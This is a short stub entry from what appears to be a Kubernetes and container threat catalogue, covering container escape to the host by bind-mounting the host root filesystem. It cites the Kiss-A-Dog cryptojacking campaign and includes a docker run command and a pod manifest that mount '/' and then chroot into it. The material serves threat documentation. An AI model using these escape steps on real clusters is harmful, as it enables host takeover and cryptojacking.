Tags
K8s
ATT&CK Tactic
Privilege Escalation (TA0004)
Incidents
Kiss-A-Dog campaignDoki cryptojacking campaign
References
https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/https://docs.docker.com/storage/bind-mounts/https://kubernetes.io/docs/concepts/storage/volumes/#hostpath
Last edited
Jan 18, 2024 1:25 PM
Status
Stub
In the case of the Kiss-a-Dog campaign, this was the escape method from the container (ran on through the exposed Docker socket) and to the host.
Attacker needs to start the new container with the -v or —mount options if using docker client or other options if using another CRI. When specifying the mounted host volume, an attacker specifies the source path to be “/” or another useful folder like so:
docker run -d \
-it \
--name devtest \
-v "/:/host-root \
malicious:imageNext, from within the container the / host directory is accessible through /host-root. Typically the next operation would be chroot-ing the /host-root to use the binaries on the host.
Similar mapping can be done on other CRIs (crio, containerd, podman) and on Kubernetes pod directly. For example:
apiVersion: v1
kind: Pod
metadata:
name: malicious-pod
spec:
containers:
- image: registry.k8s.io/malicious:latest
name: nginx
volumeMounts:
- mountPath: /test-pd
name: test-volume
volumes:
- name: test-volume
hostPath:
# directory location on host
path: /
# this field is optional
type: Directory